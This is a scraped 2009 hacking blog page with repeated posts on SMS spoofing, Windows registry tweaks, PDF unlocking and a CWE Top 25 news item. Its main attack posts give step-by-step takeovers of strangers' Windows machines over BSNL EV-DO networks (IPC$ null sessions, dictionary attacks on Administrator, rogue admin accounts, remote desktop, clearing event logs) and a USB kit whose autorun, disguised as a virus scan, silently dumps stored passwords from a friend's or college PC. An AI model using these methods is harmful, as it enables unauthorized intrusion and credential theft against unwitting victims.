The content written is strictly for educational purpose and not for misuse. SMS Forging is the trick by which you can steal the identity of the sender. The working of SMS is explained as under. First of all the sender send the SMS via SMS gateway.
The identity of the sender is attached to the SCCP packer of the SMS. The SMS once reach the SMS gateway is routed to the destination Gateway and
then to the receiver's handset. There are many ways by which we can send SMS to the SMS gateway. One of them is to use internet. Now the concept of SMS forging lies in changing the SCCP packer which contains
the sender information prior delivering to the SMS gateway. The intruder can change the SCCP packet and can send that packet to
any of the receiver as a spoofed SMS. Some of the Website on the net also provide this facility. To provide such service is not legal and the user using this may lead so
serios consequences with law. So i request you not to use this kind of trick to spoof SMS and above info
was only for educational purpose.
WELCOME GUEST ENJOY YOUR STAY HERE...
TELL A FRIEND ABOUT US..
Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts
Tuesday, September 15, 2009
Monday, September 14, 2009
Remove Hidden Shares from Win32 Boxes
NetBIOS open way for many Intruders if the port is open in a LAN, by default the port number for the NetBOS would be 139, and if it is in open state, then the hackers can take advantage over the default hidden share present in windows box specifically the IPC$ share, ( IPC - Inter Process Connect ), here the attacker can exploit this just by using the 'net use' command that is shiped with the windows machine itself, they will juts use the 'net use ' command and will establish a remote connection via IPC$ and once done, they can remotely create user account on the compromised box and can establish a telnet connection and can easily root the box. Here is a counter measure that can be taken to avoid this sort of attack, By default Windows 2000, Windows XP and WinNT automatically enables the hidden shares (admin$, c$, d$ and IPC$ - Inter Process Connect ). The following Registry Key will help you in disabling the Hidden shares. System Key: [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > LanmanServer > Parameters]
Value Name: AutoShareWks
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable shares, 1 = enable)
Goto Run and type compmgmt.msc, this will take you to the computer management, here Click on 'shared folders' and then 'share' then delete the shares that you want to remove. Note : To remove the admin share for only the current session use the second method (Computer Management console), if you want a permanent removal, add the AutoShareWks in the registry.
Value Name: AutoShareWks
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable shares, 1 = enable)
Goto Run and type compmgmt.msc, this will take you to the computer management, here Click on 'shared folders' and then 'share' then delete the shares that you want to remove. Note : To remove the admin share for only the current session use the second method (Computer Management console), if you want a permanent removal, add the AutoShareWks in the registry.
Root the Machines that are using BSNL EV-DO
BSNL is a Government body now been privatised that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning. This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL. EVDO is a Technology short for " Evolution - Data only " that uses 3G Technology introduced by Qualcomm. Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
Saturday, September 12, 2009
Unlock Yahoo when Account is Blocked
This is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for "security reasons" and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock. All you need is a list of Yahoo servers to log in with. Every time you login, you are using what's called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours. When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you? Simple, find another server. Yahoo has servers all over the place. There are more than I'd care to count. I'll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again. Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don't know what to do if the email is blocked, so they give up trying. That's why I don't even bother with the email method. I simply pick another server, log in, and I'm good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you're back in business. Some Yahoo Servers : http://cn.mail.yahoo.com/?id= 77070 CHINA
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
Tuesday, September 1, 2009
Protech OS Installation
How to Install Protech OS ? [For Absolute Beginners]
I am writing this tutorial for people who are new to Linux Distro's and Installation. Considered you have Windows XP Installed already in your computer. And this Installation method best suitable for Dual Booting option(Both Windows & Linux). Also including Screenshots for better clarity in understanding. Partitioning It would be great if you have Hiren Boot Disk for partitioning and formatting a part of the disk (may be complete) to allot it for Protech Installation. Boot the Hiren Disk and Resize or Create the partition in which you like to perform the installation. The format must be EXT2 or EXT3. I normally prefer Norton Partion Magic which is available as the first option in that Hiren Boot Menu -> Partition Tools . Hiren actually consist of many useful disk, recovery and security related tools. Take a look at the sample screenshot below.
Once done with this step, you will see a GUI Partition window where you can simply complete the Partition Job with the help of mouse if the driver available by default in the Hiren CD. * Remember you must have define the partition space for protech as atleast 5GB. Load the Protech CD
Reboot the computer after partitioning and formatting done. Now place the Protech OS CD into the CD Drive and Boot the computer using Protech. Follow the below steps to begin the Installation Process. 1 . Select Install or Upgrade option available as first in the Boot Menu Screen. 2. If you like to do any Memory or CD/DVD Error check you may do so by selecting the 3 rd and 4 th options. 3. Wait till it loads into desktop. As by default it boots as Live OS we must wait till the Desktop Loads Successfully. Also remember Protech is based on Ubuntu. Hence it is possible to use the Software Repository of Ubuntu as well as Debian by default. 4. Once loaded into the Desktop you can navigate the controls and options by simply doing Right Click in the Mouse.
5 . Application TAB Consist of Editors, Multimedia, Net, Programming and System Utilties. 6 . Next comes the Security Tools option, the one differentiate Protech OS from other Security Distributions. It actually contains a good recognized Security Software that one should play with. 7. You may change the default them to your wish in the Fluxbox Menu. 8 . Let's move on to "HOME" to begin the Installation Process. In the New Window you will see the only icon named as Install when you are in Live CD. 9. In the Pop up window you can select the default setups need to be configured. This is similar to Windows or Ubuntu Installation Steps. 10 . It is very important that you must select the Partition Space alloted previously using Hiren Boot Disk. 11 . Alright ! Configure your Root login and password, then partition selection and finally begin the installation process. 12. Once its started you may need to wait for 20 mins to 30 mins ( Depending on the Processor Speed ) to transfer the Compressed files from CD to the Hard Drive. 13 . Yummy ! Installation completed and it will prompt you for Rebooting ( Remove the CD from the CD / DVD Drive ). 14. It's all done now. You are ready to use the Protech OS with various security Tools. It also works as a Best Desktop OS for me.
I am writing this tutorial for people who are new to Linux Distro's and Installation. Considered you have Windows XP Installed already in your computer. And this Installation method best suitable for Dual Booting option(Both Windows & Linux). Also including Screenshots for better clarity in understanding. Partitioning It would be great if you have Hiren Boot Disk for partitioning and formatting a part of the disk (may be complete) to allot it for Protech Installation. Boot the Hiren Disk and Resize or Create the partition in which you like to perform the installation. The format must be EXT2 or EXT3. I normally prefer Norton Partion Magic which is available as the first option in that Hiren Boot Menu -> Partition Tools . Hiren actually consist of many useful disk, recovery and security related tools. Take a look at the sample screenshot below.
Once done with this step, you will see a GUI Partition window where you can simply complete the Partition Job with the help of mouse if the driver available by default in the Hiren CD. * Remember you must have define the partition space for protech as atleast 5GB. Load the Protech CD
Reboot the computer after partitioning and formatting done. Now place the Protech OS CD into the CD Drive and Boot the computer using Protech. Follow the below steps to begin the Installation Process. 1 . Select Install or Upgrade option available as first in the Boot Menu Screen. 2. If you like to do any Memory or CD/DVD Error check you may do so by selecting the 3 rd and 4 th options. 3. Wait till it loads into desktop. As by default it boots as Live OS we must wait till the Desktop Loads Successfully. Also remember Protech is based on Ubuntu. Hence it is possible to use the Software Repository of Ubuntu as well as Debian by default. 4. Once loaded into the Desktop you can navigate the controls and options by simply doing Right Click in the Mouse.
5 . Application TAB Consist of Editors, Multimedia, Net, Programming and System Utilties. 6 . Next comes the Security Tools option, the one differentiate Protech OS from other Security Distributions. It actually contains a good recognized Security Software that one should play with. 7. You may change the default them to your wish in the Fluxbox Menu. 8 . Let's move on to "HOME" to begin the Installation Process. In the New Window you will see the only icon named as Install when you are in Live CD. 9. In the Pop up window you can select the default setups need to be configured. This is similar to Windows or Ubuntu Installation Steps. 10 . It is very important that you must select the Partition Space alloted previously using Hiren Boot Disk. 11 . Alright ! Configure your Root login and password, then partition selection and finally begin the installation process. 12. Once its started you may need to wait for 20 mins to 30 mins ( Depending on the Processor Speed ) to transfer the Compressed files from CD to the Hard Drive. 13 . Yummy ! Installation completed and it will prompt you for Rebooting ( Remove the CD from the CD / DVD Drive ). 14. It's all done now. You are ready to use the Protech OS with various security Tools. It also works as a Best Desktop OS for me.
Add Your Name or Application to right click Of My Computer
How To Add Your Name or Application to right click Of My Computer
Play with your windows Xp with these Registry Hacks
To write your name on right click application please follow the steps:
1.Copy & Paste the following code in Notepad And then Save it as "hack.reg"
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor\command]
@="Location Of The Application"
2. Now edit it and then Type your name In
Eg:
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor]
@="roney"
3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg . C:\Program Files\Yahoo!\Messenger\ messenger.exe
Thats It finally save it And then Run it .
--------------------------- --------------------------- --------------------------- ---------------
How To add Application Control Panel
[HKEY_LOCAL_MACHINE\SOFTWA RE\Classes\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\Control Panel\command]
@="rundll32 .exe shell32.dll , Control_RunDLL"
How To add Application Add/Remove
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\Add/Remove\command]
@="control appwiz.cpl"
How To add Application Reboot/Restart
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"
How To add Application Shutdown
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"
Hope these Old hacks will be useful for you.If you have Some more Registry Hacks Share it here.
Play with your windows Xp with these Registry Hacks
To write your name on right click application please follow the steps:
1.Copy & Paste the following code in Notepad And then Save it as "hack.reg"
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor\command]
@="Location Of The Application"
2. Now edit it and then Type your name In
Eg:
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor]
@="roney"
3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:
[HKEY_CLASSES_ROOT\CLS ID\{20 D04 FE0-3 AEA-1069 - A2 D 8-08002 B 30309 D}\shell\Registry Editor\command]
@="Location Of The Application"
For eg . C:\Program Files\Yahoo!\Messenger\ messenger.exe
Thats It finally save it And then Run it .
--------------------------- --------------------------- --------------------------- ---------------
How To add Application Control Panel
[HKEY_LOCAL_MACHINE\SOFTWA RE\Classes\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\Control Panel\command]
@="rundll32 .exe shell32.dll , Control_RunDLL"
How To add Application Add/Remove
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\Add/Remove\command]
@="control appwiz.cpl"
How To add Application Reboot/Restart
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"
How To add Application Shutdown
[HKEY_CLASSES_ROOT\CLSID\{20 D04 FE0-3 AEA-1069 -A2 D 8-08002 B 30309 D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"
Hope these Old hacks will be useful for you.If you have Some more Registry Hacks Share it here.
Saturday, August 29, 2009
Remove PDF files Restriction on Print,Copy,Paste etc..
Some PDF documents prevent the user from copying and pasting or printing it's contents. This sometimes presents a problem since the creator of the PDF file might have used a font that is not available in the system trying to read it. Ensode contains a free online utility that allows you to upload a PDF, once uploaded, a version of the PDF without printing or copying/pasting restrictions is displayed in a new browser window.
How to Remove Restrictions on Printing & Copying - Unlock the Pdf File
Method 1
To unlock a PDF file, enter it's location in the "PDF file to unlock" field, by either typing it in the field or clicking on the "browse" button, then navigating to it's location. See Screenshot Below
Method 2
The Tricks Given by us in our previous post for hacking password protected PDF's in Remove Restrictions from PDF Files
The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader).
How to Remove Restrictions on Printing & Copying - Unlock the Pdf File
Method 1
To unlock a PDF file, enter it's location in the "PDF file to unlock" field, by either typing it in the field or clicking on the "browse" button, then navigating to it's location. See Screenshot Below
Method 2
The Tricks Given by us in our previous post for hacking password protected PDF's in Remove Restrictions from PDF Files
The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader).
Thursday, August 27, 2009
Hack Passwords Using USB Drive
Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4 .x/2003 , AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. il PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002 /2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Coding errors that helped Hackers and Intruders
There has been some 25 software coding errors that helped the Cyber criminals helped them to have access the site and accounts to nearly 1.5 million security breaches.
The SANS Institute in Maryland said that in 2008 , just two of the errors led to more than 1.5 m web site security breaches. The organisations, which helped making the list, include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec published the document."The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.
SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors."While, most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.The 25 Most Dangerous Programming Errors are:
CWE-116 :Improper Encoding or Escaping of OutputCWE-89 :Failure to Preserve SQL Query StructureCWE-20 :Improper Input ValidationCWE-79 :Failure to Preserve Web Page StructureCWE-78 :Failure to Preserve OS Command StructureCWE-319 :Cleartext Transmission of Sensitive InformationCWE-352:Cross-Site Request ForgeryCWE-362 :Race ConditionCWE-209 :Error Message Information LeakCWE-119 :Failure to Constrain Operations within the Bounds of a Memory BufferCWE-642 :External Control of Critical State DataCWE- 73:External Control of File Name or Path
CWE-665 :Improper InitializationCWE-426 :Untrusted Search PathCWE-94 :Failure to Control Generation of CodeCWE- 494 :Download of Code Without Integrity CheckCWE-404 :Improper Resource Shutdown or ReleaseCWE-682 :Incorrect CalculationCWE-285 :Improper Access ControlCWE-327:Use of a Broken or Risky Cryptographic AlgorithmCWE-259 :Hard-Coded PasswordCWE-732 :Insecure Permission Assignment for Critical ResourceCWE-330 :Use of Insufficiently Random ValuesCWE- 250 :Execution with Unnecessary PrivilegesCWE-602:Client-Side Enforcement of Server-Side Security (ANI)This List is produced by National Security Agency (NSA) and 30 other organisations to put forward the flaws.
The SANS Institute in Maryland said that in 2008 , just two of the errors led to more than 1.5 m web site security breaches. The organisations, which helped making the list, include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec published the document."The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.
SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors."While, most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.The 25 Most Dangerous Programming Errors are:
CWE-116 :Improper Encoding or Escaping of OutputCWE-89 :Failure to Preserve SQL Query StructureCWE-20 :Improper Input ValidationCWE-79 :Failure to Preserve Web Page StructureCWE-78 :Failure to Preserve OS Command StructureCWE-319 :Cleartext Transmission of Sensitive InformationCWE-352:Cross-Site Request ForgeryCWE-362 :Race ConditionCWE-209 :Error Message Information LeakCWE-119 :Failure to Constrain Operations within the Bounds of a Memory BufferCWE-642 :External Control of Critical State DataCWE- 73:External Control of File Name or Path
CWE-665 :Improper InitializationCWE-426 :Untrusted Search PathCWE-94 :Failure to Control Generation of CodeCWE- 494 :Download of Code Without Integrity CheckCWE-404 :Improper Resource Shutdown or ReleaseCWE-682 :Incorrect CalculationCWE-285 :Improper Access ControlCWE-327:Use of a Broken or Risky Cryptographic AlgorithmCWE-259 :Hard-Coded PasswordCWE-732 :Insecure Permission Assignment for Critical ResourceCWE-330 :Use of Insufficiently Random ValuesCWE- 250 :Execution with Unnecessary PrivilegesCWE-602:Client-Side Enforcement of Server-Side Security (ANI)This List is produced by National Security Agency (NSA) and 30 other organisations to put forward the flaws.
Friday, August 21, 2009
Learn how to hack Yahoo/MSN/AOL/Google
This is not actually hacking but recovering passwords.You can recover password oF Yahoo, Msn, Hotmal, Live, Google, Gmail, Aol, Aim, ICQ and a lot more Think a bit if you main motive is to get password anyway.
Now there are a bit of requirements
